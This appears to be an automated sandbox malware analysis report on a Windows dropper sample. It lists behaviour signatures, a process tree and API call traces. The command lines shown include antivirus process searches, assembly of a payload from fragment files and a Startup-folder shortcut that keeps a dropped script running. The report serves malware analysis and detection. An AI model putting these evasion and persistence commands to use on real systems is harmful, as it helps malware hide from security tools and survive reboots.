Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
66fd8d779da5e_EscortsRadios.exe

Overview

General Information

Sample name:66fd8d779da5e_EscortsRadios.exe
Analysis ID:1525251
MD5:9f2aa036b01b51f6ce185d8c2410c22a
SHA1:b8fa58866b466500c34a5317d3de447bd9b4cd3e
SHA256:beb7a3127427fa0560207cdb0becfebb2ed1c6d8dad335d3b3266ec741cdd495
Tags:exeuser-aachum
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • 66fd8d779da5e_EscortsRadios.exe (PID: 6656 cmdline: "C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe" MD5: 9F2AA036B01B51F6CE185D8C2410C22A)
    • cmd.exe (PID: 6804 cmdline: "C:\Windows\System32\cmd.exe" /c move Jeffrey Jeffrey.bat & Jeffrey.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7044 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7120 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7136 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7144 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5788 cmdline: cmd /c md 527294 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 4544 cmdline: findstr /V "phisexyerrorspuzzle" Recorder MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5964 cmdline: cmd /c copy /b ..\Bottle + ..\Audi + ..\Duties + ..\Integral + ..\Warren + ..\Casio + ..\Sunny d MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Miniature.pif (PID: 2484 cmdline: Miniature.pif d MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 928 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.url" & echo URL="C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 2832 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7140 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • DatumHub.scr (PID: 3668 cmdline: "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr" "C:\Users\user\AppData\Local\DatumHub Technologies\s" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" , ProcessId: 7140, ProcessName: wscript.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Miniature.pif d, CommandLine: Miniature.pif d, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\527294\Miniature.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\527294\Miniature.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\527294\Miniature.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Jeffrey Jeffrey.bat & Jeffrey.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6804, ParentProcessName: cmd.exe, ProcessCommandLine: Miniature.pif d, ProcessId: 2484, ProcessName: Miniature.pif
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\527294\Miniature.pif, ProcessId: 2484, TargetFilename: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\527294\Miniature.pif, ProcessId: 2484, TargetFilename: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" , ProcessId: 7140, ProcessName: wscript.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 928, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.url

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Jeffrey Jeffrey.bat & Jeffrey.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6804, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 7144, ProcessName: findstr.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.8% probability
Source: 66fd8d779da5e_EscortsRadios.exeJoe Sandbox ML: detected
Source: 66fd8d779da5e_EscortsRadios.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 66fd8d779da5e_EscortsRadios.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00FF4005
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00FF494A
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00FF3CE2
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00FFC2FF
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00FFCD9F
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFCD14 FindFirstFileW,FindClose,10_2_00FFCD14
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00FFF5D8
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00FFF735
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FFFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00FFFA36
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00B24005
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_00B2494A
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_00B2C2FF
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_00B2CD9F
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2CD14 FindFirstFileW,FindClose,18_2_00B2CD14
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_00B2F5D8
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_00B2F735
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_00B2FA36
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00B23CE2
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\527294\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\527294Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: unknownDNS traffic detected: query: fojjIZmGBFVhLMWz.fojjIZmGBFVhLMWz replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_010029BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_010029BA
Source: global trafficDNS traffic detected: DNS query: fojjIZmGBFVhLMWz.fojjIZmGBFVhLMWz
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: 66fd8d779da5e_EscortsRadios.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000000.1784235440.0000000001059000.00000002.00000001.01000000.00000006.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, DatumHub.scr, 00000012.00000002.2979969921.0000000000B89000.00000002.00000001.01000000.00000008.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: DatumHub.scr.10.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: 66fd8d779da5e_EscortsRadios.exe, 00000000.00000003.1745574045.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000002.2981207824.0000000003865000.00000004.00000020.00020000.00000000.sdmp, Miniature.pif, 0000000A.00000003.1801920915.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Liechtenstein.0.dr, Miniature.pif.1.dr, DatumHub.scr.10.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_01004830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_01004830
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B34830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,18_2_00B34830
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_01004632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_01004632
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_0101D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0101D164
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B4D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,18_2_00B4D164

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF42D5: CreateFileW,DeviceIoControl,CloseHandle,10_2_00FF42D5
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FE8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00FE8F2E
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FF5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00FF5778
Source: C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrCode function: 18_2_00B25778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,18_2_00B25778
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeFile created: C:\Windows\ReceivingPluginsJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeFile created: C:\Windows\AttentionStdJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeFile created: C:\Windows\HomesLandJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeFile created: C:\Windows\ChangelogBrieflyJump to behavior
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00F9B02010_2_00F9B020
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00F994E010_2_00F994E0
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00F99C8010_2_00F99C80
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FB23F510_2_00FB23F5
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_0101840010_2_01018400
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FC650210_2_00FC6502
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00F9E6F010_2_00F9E6F0
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FC265E10_2_00FC265E
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FB282A10_2_00FB282A
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FC89BF10_2_00FC89BF
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FC6A7410_2_00FC6A74
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FA0BE010_2_00FA0BE0
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_01010A3A10_2_01010A3A
Source: C:\Users\user\AppData\Local\Temp\527294\Miniature.pifCode function: 10_2_00FEEDB210_2_00FEEDB2
